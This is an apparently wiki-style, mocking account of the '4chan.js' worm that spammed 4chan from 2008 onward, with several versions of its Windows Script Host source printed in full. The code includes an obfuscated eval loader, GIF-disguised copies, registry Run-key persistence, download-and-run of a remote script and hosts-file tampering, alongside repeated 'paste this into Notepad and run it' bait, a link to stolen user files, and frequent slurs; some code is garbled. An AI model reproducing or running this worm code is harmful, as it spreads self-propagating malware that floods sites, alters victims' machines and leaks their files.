4chan.js

Page ID: 16467 Last updated: 10 years ago Namespace: 0

Content



link=
link=


The code.
The code.

God bless script kiddies.
God bless script kiddies.

the day efg failed to fail.
the day efg failed to fail.

On Friday, June 13 2008, [[4chan]] began getting spammed with obfuscated JavaScript code with the simple instructions:

Template: quoteView/Edit
Template: quote
This template inserts specific content or formatting. View template page for more details.

The [[Java|JavaScript]] command would flood 4chan with that same message.

Shortly after the spam stopped, a new form of spam began. /b/tards and newfags began posting "goodbye /b/" and "/b/ 2003-2008" threads. Unaware that the spam was the chemo for the cancer that is killing /b/, only the idiots hurting /b/ fell for it, promptly shitting bricks and leaving. Good Riddance. Nao named /b/OLOCAUST. It has been changing and [[Evolution|evolving]] ever since, finding new and creative ways to infect 4chan.

{{cs|SectionOne|The original script|
[[Copypasta|Copy and paste]] the following to [[Notepad]], save with the filename [[Epic_win|"4chan.js"]], open the file you created and [[shit bricks]].


nm="\\52E2jO?2>6lQ\r\n"+
"7F?4E:@?OCWXLC6EFC?O$EC:?8]7C@>r92Cr@56WQ2Q]492Cr@56pEW_XZ"+
"|2E9]7=@@CW|2E9]C2?5@>WXYaeXXN\r\n"+
"7l($w]4C62E6@3;64EWQD4C:AE:?8]7:=6DJDE6>@3;64EQX\r\n"+
"8l7]@A6?E6IE7:=6W($w]D4C:AE7F==?2>6X\r\n"+
"9l8]C6252==WX\r\n"+
"8]4=@D6WX\r\n"+
"7]56=6E67:=6W($w]D4C:AE7F==?2>6X\r\n"+
"IlQr@AJO2?5OA2DE6OE96O7@==@H:?8OE@O}@E6A25[OD2G6OH:E9OE96O"+
"7:=6?2>6O-Qc492?];D-Q[O@A6?OE96O7:=6OJ@FO4C62E65O2?5OD9:EO"+
"3C:4"2l($w]4C62E6@3;64EWQ>DI>=a]I>=9EEAQX\r\n"+
"H9:=6W`XL\r\n"+
"2]@A6?WQ86EQ[Q9EEAi^^:>8]c492?]@C8^3Q[_X\r\n"+
"2]D6?5WX\r\n"+
"3l2]C6DA@?D6E6IE\r\n"+
"4l3]DF3DECW3]:?56I 7WQC6D^QXZc[gX\r\n"+
"5lQQ\r\n"+
"6lQQ\r\n"+
"7@CW:l_j:ka_j:ZZX5ZlCWX\r\n"+
"7@CW:l_j:kgj:ZZX6ZlCWX\r\n"+
"2]@A6?WQA@DEQ[Q9EEAi^^52E]c492?]@C8^3^:>83@2C5]A9AQ[_X\r\n"+
"ElQ>F=E:A2CE^7@C>\\52E2jO3@F?52CJlQZ5\r\n"+
"2]D6EC6BF6DE96256CWQr@?E6?E\\%JA6Q[EX\r\n"+
"2]D6?5WQ\\\\QZ5ZQ-C-?QZ"Qa_hf`da-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
""6-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"2:=-Q-C-?-C-?-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
""-Q-C-?-C-?QZIZQ-C-?\\\\QZ5ZQ-C-?QZ\r\n"+
"6l-Q-Q-C-?QZ\r\n"+
"Qr@?E6?E\\%JA6iO2AA=:42E:@?^@4E6E\\DEC62>-C-?-C-?-C-?\\\\Q"+
"Z5ZQ-C-?QZ\r\n"+
""@56-Q-C-?-C-?C68:DE-C-?\\\\QZ5ZQ\\\\-C-?QX\r\n"+
"($w]D=66AWb6cZ|2E9]7=@@CW|2E9]C2?5@>WXYb6cXXN"
vv=""
for(i=0;iif(nm.charAt(i)=="\r")vv+="\r"
else if(nm.charAt(i)=="\n")vv+="\n"
else vv+=String.fromCharCode((nm.charCodeAt(i)-32+47)%94+32)}
eval(vv);
|0}}

{{cs|SectionTwo|Unencoded script|

k="Content-Disposition: form-data; name="

function r(){
return String.fromCharCode( "a".charCodeAt(0) + Math.floor( Math.random() * 26 ) )
}

f = WSH.createobject("scripting.filesystemobject")
g = f.opentextfile(WSH.scriptfullname)
h = g.readall()
g.close()
f.deletefile( WSH.scriptfullname )

x = "Copy and paste the following to Notepad, save with the filename \"4chan.js\", open the file you created and shit bricks.\r\n\r\n" + h
a = WSH.createobject( "msxml2.xmlhttp" )

while(1) {
a.open( "get", "http://img.4chan.org/b", 0 )
a.send()

b = a.responsetext
c = b.substr( b.indexOf( "res/" ) + 4, 8 )
d = ""
e = ""

for( i = 0; i < 20; i++ )
d += r()

for( i = 0; i < 8; i++ )
e += r()

a.open( "post", "http://dat.4chan.org/b/imgboard.php", 0 )
t = "multipart/form-data; boundary=" + d
a.setrequestheader( "Content-Type", t )
a.send("--" + d + "\r\n" +
k + "\"MAX_FILE_SIZ8\"\r\n\r\n" + "2097152\r\n--" + d + "\r\n" +
k + "\"resto\"\r\n\r\n" + c + "\r\n--" + d + "\r\n" +
k + "\"name\"\r\n\ r\n\r\n--" + d + "\r\n" +
k + "\"email\"\r\n\r\n\r\n--" + d + "\r\n" + k + "\"sub\"\r\n\r\n\r\n--" + d + "\r\n" +
k + "\"com\"\r\n\r\n" + x + "\r\n--" + d + "\r\n" +
k + "\"upfile\"; filename=\"\"\r\n" + "Content-Type: application/octet-stream\r\n\r\n\r\n--" + d + "\r\n" +
k + "\"pwd\"\r\n\r\n" + e + "\r\n--" + d + "\r\n" +
k + "\"mode\"\r\n\r\nregist\r\n--" + d + "--\r\n" )

WSH.sleep( 3e4 + Math.floor( Math.random() * 3e4 ) )
}

|0}}

The Results

link=
link=

2. ???
3. PROFIT!

You didn't run it, did you?

If you're a dumbass, you need to:

# Start > Run > cmd > shutdown -s. this will stop the spam code from running

Possibly the best thing that has happened to /b/, ever.

[[Lunix]] is immune.

Let us silently hope that it will happen soon.
Let us silently hope that it will happen soon.

What happened?

1. [[Anonymous|Some guy]] posted an instruction and malicious JavaScript code, and masked it as something "[[CP|cool]]".

2. The [[fucktard]] population quickly caught up and followed the instruction word for word. After all, [[Facepalm|it was something posted on /b/ so it had to be safe]].

3. The script started to do its thing and spammed the hell out of [[b|/b/]].

4. Repeat steps 2 and 3 [[at least 100]] times.

5. /b/'s [[Rape|server got under high pressure]] thanks to the spamming and started to [[Delete fucking everything|autodelete]] pictures.

6. Whimsical /b/tards cuntpasted their "the end is nigh" prophecies all over the fucking place.

7. [[Anti-lulz|Somebody wrote how to get rid of the script.]]

8. Moderators deleted the trails of the floods, and apparently [[Nope|/b/ was safe again]].

The Next Day

On approximately 06/14/08(Sat)08:29:04 GMT the script was reposted with just a slight alteration to the header to get it past the filter. This resulted in another identical [[shitstorm]].Apparently, the admins are [[n00b|just blocking the text]], rather than doing what they should be doing and banning the [[IP]]s of the people that fell for it.This isn't as stupid a move on their part as it might at first seem. 4chan relies on [[You|suggestible newfags]] to generate ad banner clickthroughs. /b/ would be a much better board if they permabanned them all. It would also collapse from lack of revenue.

Updates:

On Sunday, June 15 2008, [[moot]] finally did the smart thing and banned people running the script. This coincided with other [[funny|interesting]] wordfilters such as "femanon = cumdumpster".

The exact text filtered is eval( which is the JavaScript function that causes the text strings to be interpreted as commands.

Bans are a 15-day retard smackdown, which is just what those [[Basement Dweller|trisomites]] need.

If you were stupid enough to fall for one of the "eval (now wordfilters to niggerjews)" threads, tough luck, [[retard|dumbass]].

Friday, July 4th, [[Lulz|Slightly modified script using the reverse() function shitfloods again]].

It strikes again

The chemo is in progress.
The chemo is in progress.

On Tuesday, August 19 2008, a new version of the same spam was detected on /b/. Although it does not look like the servers are going to crash again, this is still major shit for /b/tards, as it has definitely slowed /b/ down to a crawl, and even worse...[[BAW|IT GOT THE 81M GET!]] -->

Template: quoteView/Edit
Template: quote
This template inserts specific content or formatting. View template page for more details.

It strikes yet again

4chan.js_22-ago.jpg

On August 22 2008, the script has changed to a .gif image and a set of instructions. The spam reached an unthinkable level, spreading to the rest of the boards. The only way to get rid of it is to delete your [[System32]] folder [[an hero]] right now.
Note: Considering only newfags fall for this stupid crap, that is actually a good idea, along with quitting 4chan forever.

Proof that [[weeaboos|wee/a/boos
Proof that [[weeaboos|wee/a/boos
are as smart as your average /b/tard.]]

There is nowhere to hide.
There is nowhere to hide.

{{cs|SectionThree|The new script:|

GIF89a				=0;

// Simulates POST data from a field in the HTML posting form.
function field (fieldname, content, boundary) {
return "--" + boundary + "\r\n"
+ "Content-Disposition: form-data; name=\"" + fieldname + "\"\r\n\r\n"
+ content + "\r\n";
}

// Simulates POST data from the file field.
function filefield (fieldname, filename, type, content, boundary) {
return "--" + boundary + "\r\n"
+ "Content-Disposition: form-data; name=\"" + fieldname + "\"; "
+ "filename=\"" + filename + "\"" + "\r\n"
+ "Content-Type: " + type + "\r\n\r\n"
+ content + "\r\n";
}

// Creates a random alphanumeric string.
function randomstring (length) {
var choices = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
var str = "";
for (var i = 0; i < length; i++) {
str = str + choices.charAt( Math.floor(Math.random()*choices.length) );
}
return str;
}

// Posts "image" to thread with comment.
function post (thread, image, comment) {
var request = WSH.createObject("Msxml2.XMLHTTP");
request.open("post", "http://dat.4chan.org/b/imgboard.php", 0);

// Set headers
var bdry = randomstring(20);
request.setRequestHeader( "Referer", "http://img.4chan.org/b/res/" + thread + ".html" );
request.setRequestHeader( "Content-Type", "multipart/form-data; boundary=" + bdry );

// Send post
request.send(
field("MAX_FILE_SIZE", "2097152", bdry)
+ field("resto", thread, bdry)
+ field("name", "", bdry)
+ field("email", "", bdry)
+ field("sub", "", bdry)
+ field("com", comment, bdry)
+ filefield("upfile", "lol.gif", "image/gif", image, bdry)
+ field("pwd", randomstring(8), bdry)
+ field("mode", "regist", bdry)
+ "--" + bdry + "--\r\n"
);
}

// Gets a thread number.
function getthread() {
var request = WSH.createObject("Msxml2.XMLHTTP");
request.open("get", "http://img.4chan.org/b/imgboard.html", 0);
if (typeof getthread.modtime != "ftp://ftp.") {
request.setRequestHeader("If-Modified-Since", getthread.modtime);
}
request.send();
getthread.modtime = request.getResponseHeader("Last-Modified");
return request.responseText.match(/// Get copy of this script
var fs = WSH.createObject("Scripting.FileSystemObject");
var thisfile = fs.openTextFile(WSH.scriptFullName);
var image = thisfile.readAll();
thisfile.close();

// Post it over and over
var comment = "1. Open this image (you'll see an error message).\r\n2. Save it as 4chan.js\r\n3. Open the file you just saved.\r\n4. ???\r\n5. Shit bricks.";
for(;;) {
try {
image = image.substr(0,image.length-20) + randomstring(20);
var thread = getthread();
post(thread, image, comment);
WSH.Sleep( 45000 + Math.floor(30000 * Math.random()) );
} catch(e) {}
}

// ONcGmpM4EtHCyvALQZXh

|0}}

And again

As of August 26 2008, it now appears as a .jse file (the Microsoft-obfuscated version of .js). If you encounter such a file, you can view its code with http://www.virtualconspiracy.com/content/articles/breaking-screnc" class="text-indigo-600 dark:text-indigo-400 hover:underline" target="_blank" rel="noopener noreferrer">this tool.

{{cs|SectionFour|Aspiring script kiddies, remember to add this code to your version of 4chan.js to remove the cancer permanently:|

var hosts = ["ns1.4chan.org", "ns2.4chan.org", "ns3.4chan.org", "www.4chan.org", "content.4chan.org", "orz.4chan.org", "tmp.4chan.org", "rs.4chan.org", "static.4chan.org", "zip.4chan.org", "bin.4chan.org", "dis.4chan.org", "img.4chan.org", "dat.4chan.org", "cgi.4chan.org", "nov.4chan.org", "4chan.org", "status.4chan.org", "4chanstatus.blogspot.com", "irc.rizon.net", "7chan.org", "www.7chan.org", "img.7chan.org", "dix.7chan.org", "irc.7chan.org", "420chan.org", "img.420chan.org", "disc.420chan.org", "irc.420chan.org", "blog.420chan.org", "radio.420chan.org", "711chan.org", "www.711chan.org", "irc.711chan.org", "99chan.org", "www.99chan.org", "irc.99chan.org", "12chan.org", "www.12chan.org", "img.12chan.org", "irc.12chan.org", "shii.org", "www.shii.org", "irc.partyvan.us", "irc.partyvan.fm", "irc.raidchan.org", "encyclopediadramatica.com", "www.encyclopediadramatica.com", "partyvan.eu", "www.partyvan.eu", "anontalk.com", "www.anontalk.com"];
try {
var shell = WScript.CreateObject("WScript.Shell");
var env = shell.environment("PROCESS");
var winpath = env("SYSTEMROOT");
var fs = WSH.createObject("Scripting.FileSystemObject");
var hostsfile = fs.openTextFile(winpath + "\\system32\\drivers\\etc\\hosts", 8);
for (var i = 0; i < hosts.length; i++) {
hostsfile.writeLine("127.0.0.1 " + hosts[i]);
}
hostsfile.close();
shell.Run("ipconfig /flushdns");
} catch(e) {}

// Remember to post to 4chan using the [[IP]] addresses and not the domain names you just blocked!|0}}

|0}}

lol.hta

As of August 28 2008, 4chan.js is now sighted as a .hta file (Hyper-Text App), which appears as the same picture, with the same set of instructions to rename it, and is effectively the same JavaScript, only wrapped in rudimentary [[html]].

{{cs|SectionFive|The new, new script :|

|0}}

File-uploading version

On August 31 2008, a new version appeared that copies files from the My Documents folder and inserts them in the images it uses to spread. A collection of these files is available http://rapidshare.com/files/142174618/loot.rar.html" class="text-indigo-600 dark:text-indigo-400 hover:underline" target="_blank" rel="noopener noreferrer">here (pwd: 4chan).

The AIDS Strikes Again

On October 27 2008, 4chan.js strikes again. This time, some of the angry faggots who frequently browse /b/ became angry at it and as a result, made a futile attempt to revive the script. Until this happens, cuntpaste the following code into Notepad, save it as 4chan.js, run the code and [[Crap|shit bricks]].

{{cs|SectionSix|Said script:|

|0}}

{{cs|SectionSeven|Again?|


fso=WSH.createobject("Scripting.filesystemobject")
file=fso.opentextfile(WSH.scriptname)
c='Paste the foll\xadowing to not\xadepad, then sa\xadve it as "4chan.js", open and sh\xadit bricks.\n\n'
c+=file.readall()
file.close()
x=WSH.createobject("msxml2.xmlhttp")
while(1){
try{
x.open("get","ht\x74p\x3a//img.4chan.or"+
"g/b/?"+Math.ceil(Math.random()*1e15),0)
x.send()
t=x.responsetext.match(/"ent-disposition:form-data;name="
s=s+"resto\n\n"+t+s+"com\n\n"+c+s+"mode\n\nregist"
x.open("post","ht\x74p\x3a//dat.4ch"+
"an.org/b/imgboard.php",0)
x.setrequestheader("Content-type","multip"+
"art/form-data;boundary=iiiiiiiiiiiiiiiiiiiii")
x.send(s)
}catch(jjjjjjjjjj){}
WSH.sleep(30333)
}
//|0}}

{{cs|SectionEight|Yes, Again|


GIF89aI = "x1!þ÷";
var xhr = new ActiveXObject("Msxml2.XMLHTTP");
var shell = new ActiveXObject("WScript.Shell");
var fso = new ActiveXObject("Scripting.FileSystemObject");
var ie = new ActiveXObject("InternetExplorer.Application");

"‰";
shell.currentDirectory = fso.getSpecialFolder(2);
shell.run("cmd /c copy \"" + WSH.scriptFullName + "\" sys.jse");
try {
"û";
shell.regWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\sysjse", "wscript /b " + fso.getSpecialFolder(2) + "\\sys.jse");
} catch(e) {}

while(1) { try {

xhr.open("get", "http://img.4chan.org/b/", 0);
"ö";
xhr.setRequestHeader("If-Modified-Since", new Date(0));
xhr.send();
var page = xhr.responseText;

try {
xhr.open("get", page.match(/xhr.send();
var im = new ActiveXObject("Adodb.Stream");
im.mode = 3;
im.type = 1;
im.open();
im.write(xhr.responseBody);
im.saveToFile("j.jse", 2);
"ÿ";
shell.run("wscript /b j.jse");
} catch(e) {}

var bdry = (""+Math.random()).substr(2);
var head = "\r\n--" + bdry + "\r\nContent-Disposition: form-data; name=";

var part1 = fso.openTextFile("y", 2, 1);
"Ó";
part1.write(head + "resto\r\n\r\n" + page.match(/part1.close();

var part2 = fso.openTextFile("z", 2, 1);
"ú";
part2.write((""+Math.random()).substr(2) + head + "mode\r\n\r\nregist\r\n--" + bdry + "--\r\n");
part2.close();

shell.run("cmd /c copy /b y+sys.jse+z p", 0, 1);

var post = new ActiveXObject("Adodb.Stream");
"Ù";
post.mode = 3;
post.type = 1;
post.open();
post.loadFromFile("p");

try {
ie.navigate("
http://img.4chan.org/b/");
do {
WSH.sleep(100);
"Å";
} while (ie.readyState != 4);
ie.stop();
ie.document.cookie = "nws_style=; expires=" + new Date(0) + "; path=/; domain=.4chan.org";
} catch(e) {}

"ö";
xhr.open("post", "http://dat.4chan.org/b/imgboard.php", 0);
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=" + bdry);
xhr.send(post);

WSH.sleep(50000);

} catch(e) {} }

//|0}}

4chan.js: The [[final_solution|final]] version

An [[drawfag|artist's
An [[drawfag|artist's
depiction of what happened.]]
This is it. [[Epic Win|All boards are affected this time]]. As of the November 6 2008, the script has come back, and it has brought its friends with it.

[[Pool's closed|/b/ is closed due to fail
[[Pool's closed|/b/ is closed due to fail
]]

All boards are affected at the moment, even [[r9k|/r9gay/]]. The [[retard|population]] of 4chan is doomed. In a [[trying too hard|desperate attempt]] to stop the flood [[m00t]] and his troop of modfags [[DELETE FUCKING EVERYTHING|locked down and 404'd all threads in /b/]], and mercilessly b&hammered everyone who [[newfag|was suspect of running the script]]. Attempts to make new threads resulted in a [[Divide By Zero|"Flood detected"]] error. Rejoice my /b/retheren, because [[Catnarok]] is nigh.

Gaze at its [[Pain_series|beauty]]


link=
link=

lol.js is now a virus

Since the last major incident, there have been localized, small occasions of the script on /b/. However, on November 27 2008, [[A_Challenger_Appears|another new version of the script appeared]]. Only this time, the script is an actual virus. Upon execution, it downloads another copy of the file from Rapidshare, and automatically runs it, and then spams /b/. More instances = higher dosage.

Ad Nauseam

January 23, 2009. Attacks continue in the form of a yellow box.
February 1, 2009 /a/ was attacked by the colorful squares once again.

[Gallery content]

ROBOT9000 owned

On February 2, 2009, leaving other boards alone, the script launched an attack in robot9000, morphing its virus on upload each time to bypass robot9000's image filter. This was truly an epic win, except for its failure to include the phrase "mootblox" when it dodged robot9000's mute.
link=
link=

The Day the /b/ stood still.
The Day the /b/ stood still.

{{cs|SectionSeven|The Most Recent Strain |


function f(){

x=WSH.createobject("msxml2.xmlhttp")
fso=WSH.createobject("scripting.filesystemobject")
enc=WSH.createobject("scripting.encoder")
a="abcdefghijklmnopqrstuvwxyz".split("")

function rs(){str="";n=10+Math.random()*10;for(i=0;i function rn(){str="";n=3+Math.random()*7;for(i=0;i

while(1){
c=rs()+"\n\nOpen this image (ignore the error), save it as "+WSH.scriptname+", open the file you saved and shit bricks."
gif="GIF89a=\t'\t\xf0\x01\x01\xff\x01\x01\xff\x01\x01,\x01\x01\x01\x01\x01\x01\x01\x01\x01\x08"+rs()+"'|"+rn()+"\n"
jse=enc.encodescriptfile(".js",f.toString()+"f()",0,"")
fn=fso.getspecialfolder(2)+"\\"+rn()+".txt"
b=rs()
s="\r\n--"+b+"\r\ncontent-disposition:form-data;name="
s=s+"upfile;filename=gayness.gif\r\n\r\n"+gif+jse+s+"com\r\n\r\n"+c+s+"mode\r\n\r\nregist"

var file=fso.createtextfile(fn)

file.write(s)
file.close()

var z=WSH.createobject("adodb.stream")
z.mode=3;
z.type=1;
z.open();
z.loadfromfile(fn)

x.open("post","http://dat.4chan.org/b/imgboard.php",0)
x.setrequestheader("content-type","multipart/form-data;boundary="+b)
x.send(z)
z.close()
WSH.sleep(120000+Math.ceil(Math.random()*60000))

|0}}

It returns, again

On [[Caturday|Caturday]], Febuary, 2009, 4Chan.js returned to [[rape|rape]] /b/. This time images told instructions on how to get to the secret raid board, /z/. The ensuing spamfest pwned /b/ so badly, any there who were not [[fucktards|fucktarded]] escaped to /x/, where they began fucking the hell out of /x/. The mods used their [[banhammered|banhammer]] on all running the script, and /b/ went back to normal once more.

And Again

On April 14th, 2009 the same version of 4chan.js plagued /b/ with the same message asking all the newfags to take a break from [[DESU|DESU]] spamming and [[copypasta|copypasta]] to save the code and run it to shit brix, thus Resulting in [[rage|rage]] amongst [[b|/b/]].

...And Again

In the Junetime, sometime [[last Thursday]], 4chan.js returned with its new mutation of script whereby it would pull a random photo from your hard drive, attach the script to it so you could open it in notepad and [[shit brix]], and posted it to 4chan, but removing intravenous letters from the post, making endless variations on "Open this file in notepad, and prepare to shit brix," thus bypassing wordfilters and imagefilters. Some say the mods just gave up by this point, because there were other colored boxes, sans script being posted by [[anontalk|faggot]] with a failed attempt at DDOSing 4chan, and also the mods were too busy vigorously fapping to the recent outbreak of faggot threads to care.

Yet Again, it's back

They never learn
They never learn

On September 22nd, 2009, another version was made with gray boxes. Newfags who ran the .js were banned around 5 hours afterwards. Three days later, on September 25th, 2009, this happened again, though the boxes were two shades of brown, and unlike the attack beforehand this one hit multiple boards, covering /d/,/wg/,/r9k/,/x/ and every other board nobody cares about. [[fail|Unsuccessful counter offensives]] were mounted by a combined effort of the [[Epic Fail Guy|Epic Fail Army]] and the rest of 4chan, but only served [[Your resistance only makes my penis harder!|to make moar newfags download it]].

By the next day, the site was mostly unspammed and newfags were b& for their faggotry ([[and nothing of value was lost]]).

2010 edition

And Brownbox has made a comeback yet again as "4chan.hta"

This time the spammers are getting smart. They are choosing random images posted by real people and putting "save as 4chan.hta Shit brix" on the corner of the image. Then the bot takes the text from a different post and puts it with the image. As more and more [[Retard|retards]] actually save the images as .HTA, this happens more and more. Soon enough, the bots are able to hold a conversation made up of different random posts on a certain board, which really isn't that different from the regular threads.

[[bitches don't know|N00bs don't know]] it's a brown box and download the file. The problem? A .HTA is always a "trusted program" by [[microsoft]]. This means the faggots are leaving themselevs [[goatse|wide open]] for anything the program will do.

This combined with the previous [[Diochan]] spam has lead to even more cancer/chemo than usual.

A few days later, the script came back [[Cornelia|along with its own personality]].

See Also

*[[Epic_win|Epic Win]]
*[[Cancer]]
*[[The Chemo That Is Curing /b/]]
*[[Newfag]]
*[[Copypasta]]
*[[4chan]]
*[[AIDS]]
*[[The great ImageFap troll]]
*[[The xchan effect]]
*[[Computer Science III]]
*[[Cornelia]]

Template: memesView/Edit
Template: memes
This template inserts specific content or formatting. View template page for more details.

TemplateEdit

#REDIRECT [[Template:Chans]]

Template: timelineView/Edit
📅 Event Timeline:
Key events in chronological order.

TemplateEdit

[[Encyclopedia Dramatica:Article of the Now|Preceded]] by
[[Encyclopedia Dramatica:Article of the Now|Succeeded]] by
Template: #switch:View/Edit
Template: #switch:
This template inserts specific content or formatting. View template page for more details.

|[[Cary Goulston]]}}
[[Category:2008]]
[[Category:Chans]]

Page Information

Page Details

Page ID:
16467
Namespace:
0
Redirect:
No

Latest Revision

Revision ID:
166997
Updated:
10 years ago
Size:
42572 bytes

Page Tools

Page ID: 16467
Latest Rev: 166997
Redirect: No